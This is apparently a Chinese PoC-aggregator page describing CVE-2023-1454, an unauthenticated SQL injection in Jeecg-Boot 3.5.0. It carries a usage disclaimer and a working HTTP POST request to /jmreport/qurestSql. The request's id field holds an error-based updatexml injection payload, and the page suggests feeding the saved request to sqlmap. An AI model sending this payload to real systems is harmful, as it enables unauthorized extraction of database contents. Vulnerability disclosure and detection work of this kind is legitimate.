POC详情: 2f30f33a3b8be32a4924bad910f1291af839665f

来源
关联漏洞
标题: jeecg SQL注入漏洞 (CVE-2023-1454)
描述:jeecg是一个应用软件。一款基于代码生成器的智能开发平台。 jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
描述
CVE-2023-1454漏洞检测脚本
介绍
# CVE-2023-1454

CVE-2023-1454漏洞检测脚本

本文仅供参考,未经授权请勿利用文章中的技术资料及工具对任何计算机系统进行入侵操作。
利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

简介
Jeecg-Boot是一款基于代码生成器的低代码开发平台,它提供了一系列的代码生成器、模板引擎、权限管理、数据字典、数据导入导出等功能,可以帮助开发者快速构建企业级应用。

漏洞概述
企业Web应用程序的Java低代码平台Jeecg-Boot(v3.5.0)用了jimureport-spring-boot-starter-1.5.6.jar,Jeecg-Boot对特殊字符的过滤存在缺陷,在前端为Vue3在v3.5.0版本条件下,Jeecg存在未授权SQL注入,漏洞点存在于/querySql路径被调用时调用的SQL在id处未做处理,由此可以直接进行报错注入,未经身份验证的远程攻击者,通过构造特制的字符串,最终可获取目标数据库中的敏感信息。

影响版本
受影响的版本:Jeecg-Boot = v3.5.0


将数据包保存为txt用sqlmap可得到数据
```
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

```
文件快照

[4.0K] /data/pocs/2f30f33a3b8be32a4924bad910f1291af839665f ├── [ 836] Jeecg-Boot_sql.py └── [1.5K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。